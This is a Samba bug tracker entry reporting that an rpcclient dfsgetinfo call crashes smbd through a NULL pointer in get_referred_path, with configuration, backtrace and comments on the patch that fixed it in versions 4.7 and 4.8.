Bug 13370 - dfsgetinfo dumps core
Summary: dfsgetinfo dumps core
Alias: None
Product: Samba 4.1 and newer
Classification: Unclassified
Component: File services (show other bugs)
Version: 4.6.2
Hardware: All All
: P5 normal (vote)
Target Milestone: ---
Assignee: Karolin Seeger
QA Contact: Samba QA Contact
Depends on:
Reported: 2018-04-06 14:59 UTC by Heinrich Mislik
Modified: 2018-04-25 06:45 UTC (History)
1 user (show)

See Also:

Fix (4.10 KB, text/plain)
2018-04-11 08:45 UTC, Volker Lendecke
no flags Details
Patch for 4.8 and 4.7 (4.34 KB, patch)
2018-04-12 11:58 UTC, Volker Lendecke
metze: review+

Note You need to log in before you can comment on or make changes to this bug.
Description Heinrich Mislik 2018-04-06 14:59:57 UTC
in function get_referred_path tsocket_address_copy gets called with NULL pointer resulting in core dump. Tested on RHEL7 with samba-4.6.2-12.el7_4.x86_64

smb.conf is:

netbios name = somehost
panic action = /bin/sleep 999999
msdfs root = yes
path = /tmp/dfsshare

symlink looks like this:

lrwxrwxrwx 1 root root 41 Apr  6 16:07 /tmp/dfsshare/someshare -> msdfs:someotherhost.example.com/someshare

dfsreferral works as expected:

# smbclient //somehost.example.com/dfsshare/someshare -U % -c showconnect
OS=[Windows 6.1] Server=[Samba 4.6.2]

dfsgetinfo results in core dump of smbd

# rpcclient somehost.example.com -U % -c 'dfsgetinfo \\\\somehost\\dfsshare\\someshare somehost someshare'

Backtrace shows 0x0 in call to _tsocket_address_copy:

#0  0x00007efca982edbc in waitpid () from /lib64/libc.so.6
#1  0x00007efca97b1cc2 in do_system () from /lib64/libc.so.6
#2  0x00007efcab11c7e1 in smb_panic_s3 (why=<optimized out>) at ../source3/lib/util.c:804
#3  0x00007efcad1f795f in smb_panic (why=why@entry=0x7efcad23f82a "internal error")
    at ../lib/util/fault.c:166
#4  0x00007efcad1f7b76 in fault_report (sig=<optimized out>) at ../lib/util/fault.c:83
#5  sig_fault (sig=<optimized out>) at ../lib/util/fault.c:94
#6  <signal handler called>
#7  _tsocket_address_copy (addr=0x0, mem_ctx=0x561bb5c3f470, 
    location=0x7efcacef5903 "../source3/smbd/msdfs.c:1091") at ../lib/tsocket/tsocket.c:96
#8  0x00007efcacdabb47 in get_referred_path (ctx=ctx@entry=0x561bb5c3e600, 
    dfs_path=0x561bb5c3e8b0 "\\\\somehost\\dfsshare\\someshare", remote_address=<optimized out>, 
    local_address=0x0, allow_broken_path=allow_broken_path@entry=true, 
    jucn=jucn@entry=0x561bb5c3eed0, consumedcntp=consumedcntp@entry=0x7ffe762d315c, 
    self_referralp=self_referralp@entry=0x7ffe762d315b) at ../source3/smbd/msdfs.c:1091
#9  0x00007efcacce5e1f in _dfs_GetInfo (p=p@entry=0x561bb5c3da60, r=r@entry=0x561bb5c3e660)
    at ../source3/rpc_server/dfs/srv_dfs_nt.c:380
#10 0x00007efcacce8bb4 in api_dfs_GetInfo (p=0x561bb5c3da60)
    at default/librpc/gen_ndr/srv_dfs.c:351
#11 0x00007efcace32f22 in api_rpcTNP (p=p@entry=0x561bb5c3da60, pkt=pkt@entry=0x561bb5c37d70, 
    api_rpc_cmds=<optimized out>, n_cmds=23, syntax=syntax@entry=0x561bb5c3d480)
    at ../source3/rpc_server/srv_pipe.c:1476
#12 0x00007efcace3524c in api_pipe_request (pkt=0x561bb5c37d70, p=0x561bb5c3da60)
    at ../source3/rpc_server/srv_pipe.c:1411
#13 process_request_pdu (pkt=0x561bb5c37d70, p=0x561bb5c3da60)
    at ../source3/rpc_server/srv_pipe.c:1680
#14 process_complete_pdu (p=0x561bb5c3da60, pkt=0x561bb5c37d70)
    at ../source3/rpc_server/srv_pipe.c:1698
#15 0x00007efcaccf3a4d in named_pipe_packet_process (subreq=<optimized out>)
    at ../source3/rpc_server/rpc_server.c:439
#16 0x00007efca5771397 in dcerpc_read_ncacn_packet_done (subreq=0x561bb5c37e80)
    at ../librpc/rpc/dcerpc_util.c:835
#17 0x00007efcaacc50c9 in tstream_readv_pdu_readv_done (subreq=0x561bb5c30ed0)
    at ../lib/tsocket/tsocket_helpers.c:319
#18 0x00007efcaacc3fab in tstream_readv_done (subreq=0x561bb5c311f0)
    at ../lib/tsocket/tsocket.c:604
#19 0x00007efca9b38aba in tevent_common_loop_immediate () from /lib64/libtevent.so.0
#20 0x00007efca9b3dc9d in epoll_event_loop_once () from /lib64/libtevent.so.0
#21 0x00007efca9b3c2a7 in std_event_loop_once () from /lib64/libtevent.so.0
---Type <return> to continue, or q <return> to quit---
#22 0x00007efca9b380cd in _tevent_loop_once () from /lib64/libtevent.so.0
#23 0x00007efca9b382fb in tevent_common_loop_wait () from /lib64/libtevent.so.0
#24 0x00007efca9b3c247 in std_event_loop_wait () from /lib64/libtevent.so.0
#25 0x00007efcacda4fb4 in smbd_process (ev_ctx=ev_ctx@entry=0x561bb5c15910, 
    msg_ctx=msg_ctx@entry=0x561bb5c15d40, sock_fd=sock_fd@entry=41, 
    interactive=interactive@entry=false) at ../source3/smbd/process.c:4126
#26 0x0000561bb40caa74 in smbd_accept_connection (ev=0x561bb5c15910, fde=<optimized out>, 
    flags=<optimized out>, private_data=<optimized out>) at ../source3/smbd/server.c:1017
#27 0x00007efca9b3dedb in epoll_event_loop_once () from /lib64/libtevent.so.0
#28 0x00007efca9b3c2a7 in std_event_loop_once () from /lib64/libtevent.so.0
#29 0x00007efca9b380cd in _tevent_loop_once () from /lib64/libtevent.so.0
#30 0x00007efca9b382fb in tevent_common_loop_wait () from /lib64/libtevent.so.0
#31 0x00007efca9b3c247 in std_event_loop_wait () from /lib64/libtevent.so.0
#32 0x0000561bb40c5a95 in smbd_parent_loop (parent=<optimized out>, ev_ctx=0x561bb5c15910)
    at ../source3/smbd/server.c:1384
#33 main (argc=<optimized out>, argv=<optimized out>) at ../source3/smbd/server.c:2038


Comment 1 Volker Lendecke 2018-04-11 08:45:35 UTC
Created attachment 14121 [details]

The attached patch (for master) fixes it for me.
Comment 2 Volker Lendecke 2018-04-12 11:58:55 UTC
Created attachment 14126 [details]
Patch for 4.8 and 4.7

Patch cherry-picked from master, applies and builds in 4.8 and 4.7
Comment 3 Karolin Seeger 2018-04-19 09:37:34 UTC
(In reply to Volker Lendecke from comment #2)
Pushed to autobuild-v4-[8,7]-test.
Comment 4 Karolin Seeger 2018-04-25 06:45:09 UTC
(In reply to Karolin Seeger from comment #3)
Pushed to both branches.
Closing out bug report.